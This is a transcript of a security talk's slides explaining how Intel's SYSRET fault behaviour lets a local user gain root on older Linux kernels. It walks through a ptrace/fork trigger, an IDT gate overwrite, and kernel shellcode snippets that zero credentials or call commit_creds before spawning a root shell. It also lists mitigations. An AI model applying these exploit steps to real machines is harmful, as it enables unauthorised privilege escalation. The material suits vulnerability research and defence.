exploiting the linux kernel via intel's sysret implementation

38
Exploiting the Linux Kernel via Intel's SYSRET Implementation Niko@FluxFingers

Upload: nkslides

Post on 02-Jul-2015

1.599 views

Category:

Science


2 download

DESCRIPTION

Intel handles SYSRET instructions weirdly and might throw around exceptions while still being in ring0. When the kernel is not being extra careful when returning to userland after being signaled with a syscall bad things can happen. Like root shells.

TRANSCRIPT

Page 1: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Exploiting the Linux Kernel via Intel's SYSRET ImplementationNiko@FluxFingers

Page 2: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Outline

●Syscalls and Context Switches●Canonical Addresses●SYSRET #GP Triggering●Step by Step Exploitation and Rooting

Page 3: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Linux x86_64 Syscalls

●On OLD x86 Processors int $0x80 with Nr. in %eax and Params in %ebx, %ecx, etc○However it’s super slow and got replaced with Intel’s

SYSENTER mechanism●x86_64 uses AMD’s SYSCALL with Params in %rdi, %

rsi, %rdx, %rcx, ...○ Faster to handle than the whole interrupt path○ Intel CPUs adapted SYSCALL according to AMD’s specs since it

became the standard syscall-mechanism

Page 4: Exploiting the Linux Kernel via Intel's SYSRET Implementation

SYSCALL/SYSRET

●Whenever a syscall is invoked via SYSCALL a context switch to kernel mode takes place○When leaving the syscall the kernel needs to restore specific

userland registers ○And transfer back to ring3 with SYSRET

●SYSRET is fast since it “only” needs to:○ Load the saved %rip from %rcx○ Swap %cs back to ring3 mode

●The kernel itself has to make sure to restore all other userland registers before executing SYSRET

Page 5: Exploiting the Linux Kernel via Intel's SYSRET Implementation

SYSCALL/SYSRET0x0000000000000000

0x0000000000400000Process (/bin/cat)

.text, .data, .bss, Heap0x00000000006XXXXX

Shared Libraries

0x00007ffffXXXXXXX

Stack

0x00007fXXXXXXXXXX

VSYSCALL

0xffffffffff600000

0xffffffff80000000

Kernel Memory

SYSCALL

Page 6: Exploiting the Linux Kernel via Intel's SYSRET Implementation

SYSCALL/SYSRET0x0000000000000000

0x0000000000400000Process (/bin/cat)

.text, .data, .bss, Heap0x00000000006XXXXX

Shared Libraries

0x00007ffffXXXXXXX

Stack

0x00007fXXXXXXXXXX

VSYSCALL

0xffffffffff600000

0xffffffff80000000

Kernel MemorySYSRET

Page 7: Exploiting the Linux Kernel via Intel's SYSRET Implementation

How Linux handles SYSRET

●arch/x86/kernel/entry_64.S:

ret_from_sys_call: movl $_TIF_ALLWORK_MASK,%edi...sysret_check:... movq RIP-ARGOFFSET(%rsp),%rcx CFI_REGISTER rip,rcx RESTORE_ARGS 1,-ARG_SKIP,0 movq PER_CPU_VAR(old_rsp), %rsp USERGS_SYSRET64

●The kernel makes sure to restore %rsp and %gs etc and calls SYSRET in the end

Page 8: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Canonical Addresses

●On x86_64 registers are 64 bit wide●The instruction pointer (%rip) can only use 48 bits

○ 48 Bits == balanced value for page-tables/accessible memory●Leftover bits of %rip used for CPU specific tricks

○ like NX bit on position 63●Meaning the value of %rip has to be “canonical” aka

between○0x0000000000000000 -> 0x00007FFFFFFFFFFF○0x00FFFFFFFFFFFFFF -> 0xFFFF800000000000

● (Bits 48 .. 63 have to be copies of bit 47)●Non-canonical values in %rip are not allowed and will

trigger exceptions in certain cases

Page 9: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Non-canonical addresses and SYSRET

●Whenever a SYSRET is executed and the CPU sees a non-canonical value in %rcx it triggers a #GP

●AMD specs however never defined when the #GP will actually happen

●Clever researches at XEN found out AMD CPUs will trigger #GP when back in Usermode

●Not so on Intel ...

Page 10: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Intel’s Version of SYSRET

●AMD’s specs omitted the check for non-canonical values in %rcx / %rip

● Intel decided to check for non-canonical values before the privilege level is changed

Page 11: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Intel’s Version of SYSRET

●Triggering a #GP from kernel mode has consequences on Linux

●Recall that prior to executing SYSRET Linux restores the userland %rsp and swaps %gs

● Intel’s SYSRET will #GP on the userland stack while still being in ring0

Page 12: Exploiting the Linux Kernel via Intel's SYSRET Implementation

#GP on userland %rsp

●#GP is an exception reached via an IDT entry:arch/x86/kernel/traps.c:set_intr_gate(X86_TRAP_GP, general_protection);

●Where general_protection resolves to an error_entry macro in arch/x86/kernel/entry_64.S:

.macro errorentry sym do_sym ENTRY(\sym) XCPT_FRAME ASM_CLAC PARAVIRT_ADJUST_EXCEPTION_FRAME subq $ORIG_RAX-R15, %rsp CFI_ADJUST_CFA_OFFSET ORIG_RAX-R15 call error_entry...

Page 13: Exploiting the Linux Kernel via Intel's SYSRET Implementation

#GP on userland %rsp

● error_entry sets up an exception stack and backups all registers:ENTRY(error_entry) XCPT_FRAME CFI_ADJUST_CFA_OFFSET 15*8

cld movq_cfi rdi, RDI+8 movq_cfi rsi, RSI+8 movq_cfi rdx, RDX+8

…● where movq_cfi is defined as

.macro movq_cfi reg offset=0 movq %\reg, \offset(%rsp) CFI_REL_OFFSET \reg, \offset.endm

Page 14: Exploiting the Linux Kernel via Intel's SYSRET Implementation

#GP on userland %rsp

●When setting up the stack frame in error_entry all (general) registers are saved to x(%rsp) / [rsp+x]

●The kernel restored the userland %rsp and registers before SYSRET

●=> Arbitrary memory write while in ring0●Classic possibility for privilege escalation

Page 15: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Linux’ Protection against n/c %rip

●This behaviour already bit Linux in 2006 (CVE-2006-0744)

●To make sure no code lands up in non-canonical address space (or right before) a guard page was introduced

●mmap(0x7ffffffff000, 4096, PROT_READ … will return ENOMEM

●This way SYSRET “shouldn’t” return to any n/c address

Page 16: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Linux’ Protection against n/c %rip

●Another possibility is using a “safe” IRET path for returning back to ring3○ IRET requires ring3-backup on the stack to return to user-code○ Is slower than SYSRET

●The ptrace interface sets an IRET path most of the time

●However some syscalls use a SYSRET path albeit being ptraced

●One example is fork() since it signals with ptrace_event() that does not force IRET

Page 17: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Crash PoC

● fork() a child●Child sets PTRACE_TRACEME●Raise SIGSTOP●Parent sets PTRACE_O_TRACEFORK●Child fork()s again●Parent catches this fork●And uses PTRACE_SETREGS to set %rip to n/c●Pivots %rsp to arbitrary place●And PTRACE_CONTINUEs●fork() will return with SYSRET with n/c %rcx●CPU will #GP, Pagefault, Doublefault and Panic

Page 18: Exploiting the Linux Kernel via Intel's SYSRET Implementation

How to get root

Page 19: Exploiting the Linux Kernel via Intel's SYSRET Implementation

The plan

●We need to get Kernel Code Execution between the #GP and Panic

●Then restore the damage we have done●Set credentials of current process to 0●Return back to userland●And open shell

Page 20: Exploiting the Linux Kernel via Intel's SYSRET Implementation

The target

●Since #GP will always trigger a Pagefault and Doublefault we can pivot %rsp back to IDT

●And set 2 specific registers to craft a fake IDT gate●That will be placed instead of the orig Page- or

Doublefault handler.

Page 21: Exploiting the Linux Kernel via Intel's SYSRET Implementation

IDT Layout

●We can read IDTR with the sidt-instruction

Page 22: Exploiting the Linux Kernel via Intel's SYSRET Implementation

IDT Gate Entry

●And setup a new gate with modified “Offsets”

Page 23: Exploiting the Linux Kernel via Intel's SYSRET Implementation

The target

●Before we trigger #GP we can allocate a Landing Area in Userland

●Where we copy code that will be executed●Craft a fake IDT gate that points to this area●Triggering #GP will then overwrite e.g. Doublefault

with the fake gate●And the kernel will jump to Userland and execute

our code with kernel privs

Page 24: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Kernel Shellcode

● Inside this code we will have to swapgs in order to access kernel structures

●Then we carefully rebuild all IDT entries that were trashed in the overwrite process

●Then we can raise process credentials

Page 25: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Process structures

●Each process in userland has an associated kernel structure (thread_union) that builds the kernel stack:

Kernel Stack

thread_info

thread_union

Page 26: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Process structures

●thread_info itself has an element that points to task_struct

*task_struct

thread_info

*exec_domain

Page 27: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Process structures < 2.6.29

●task_struct contains lots of info about the running task

●and its credentials

...uid, guid, caps,...

state

task_struct

stack

usage

Page 28: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Process structures < 2.6.29

...uid, guid, caps,...

state

task_struct

stack

usage

*task_struct

thread_info

*exec_domain

Kernel Stack

thread_info

thread_union

Page 29: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Kernel Shellcode

●On < 2.6.29 raising process credentials is a matter of finding uid, gid and caps in task_struct

●And patching them to 0●Luckily %gs in kernel mode contains offset to

x8664_pda (/include/asm-x86/pda.h)/* Per processor datastructure. %gs points to it while the kernel runs */ struct x8664_pda { struct task_struct *pcurrent; /* 0 Current process */ unsigned long data_offset; /* 8 Per cpu data offset from linker address */ unsigned long kernelstack; /* 16 top of kernel stack for current */ unsigned long oldrsp; /* 24 user rsp for system call */ int irqcount; /* 32 Irq nesting counter. Starts with -1 */ int cpunumber; /* 36 Logical CPU number */#ifdef CONFIG_CC_STACKPROTECTOR unsigned long stack_canary;...

Page 30: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Kernel Shellcode

●%gs:0 will point to task_struct●So we can simply:

asm("movq %%gs:0, %0" : "=r"(ptr));

cred = (uint32_t *)ptr;

for (i = 0; i < 1000; i++, cred++) { if (cred[0] == uid && cred[1] == uid && cred[2] == uid && cred[3] == uid && cred[4] == gid && cred[5] == gid && cred[6] == gid && cred[7] == gid) { cred[0] = cred[1] = cred[2] = cred[3] = 0; cred[4] = cred[5] = cred[6] = cred[7] = 0;

●Where uid/gid are getuid() and getdid()●And our process will be root

Page 31: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Kernel Shellcode

●On > 2.6.29 x8664_pda is removed●And task_struct contains a new member called

cred (credential records)● If %rsp wasn’t modified we could walk back to top

of stack to find thread_info ●And do heuristic scanning to find thread_info-

>task_struct->creds->uid/gid●However with credential records come two new

functions●prepare_kernel_cred / commit_creds

Page 32: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Kernel Shellcode

●prepare_kernel_cred creates a new clean credentials structure

●commit_creds installs the new cred to the current task

●Both symbols are exported through /proc/kallsyms or /boot/System.map

●Kernel shellcode just needs tocommit_creds(prepare_kernel_cred(0));

●And we’re root again

Page 33: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Kernel Shellcode

●Next we will have to cleanly return back to userland

●Easiest method is to use IRET: __asm__ __volatile__( "movq %0, 0x20(%%rsp);" "movq %1, 0x18(%%rsp);" "movq %2, 0x10(%%rsp);" "movq %3, 0x08(%%rsp);" "movq %4, 0x00(%%rsp);" "swapgs;" "iretq;" :: "i"(USER_SS), "i"(user_stack), "i"(USER_FL), "i"(USER_CS), "i"(user_code) );

●Where user_code points to memory in userland that should be executed when kernel exits

Page 34: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Popping uid=0(root)

●user_code can do anything now since it runs as root

●So we can simply execve(/bin/sh) from there●However that happens inside the child so we have

to bring the rootshell back to the parent●Or we just chmod() or setxattr() to drop a root-

shell

Page 35: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Demo Time

Page 36: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Liminations

●These techniques work well with 2.6.18 - 3.9.X3.10 mitigates the IDT attack by remapping it to rodata (arch/x86/kernel/traps.c)__set_fixmap(FIX_RO_IDT, __pa_symbol(idt_table), PAGE_KERNEL_RO);idt_descr.address = fix_to_virt(FIX_RO_IDT);

●CPUs with SMAP/SMEP will detect accessing userland code while still being in ring0

●Grsecurity will provide handful of protections to make this bug a pain to exploit○GRKERNSEC_RANDSTRUCT○ PAX_MEMORY_UDEREF○GRKERNSEC_HIDESYM○ ...

Page 37: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Further thoughts

●Linux fix is weird (“only” forces ptrace_stop() to use IRET)

●Syscalls can still return via SYSRET●Also bug within SYSRET is still present●Since it’s a hardware issue it might be present in

other OSes in different variations (OHAI 2006)●Any1 wanna check FreeBSD …?

Page 38: Exploiting the Linux Kernel via Intel's SYSRET Implementation

Questions?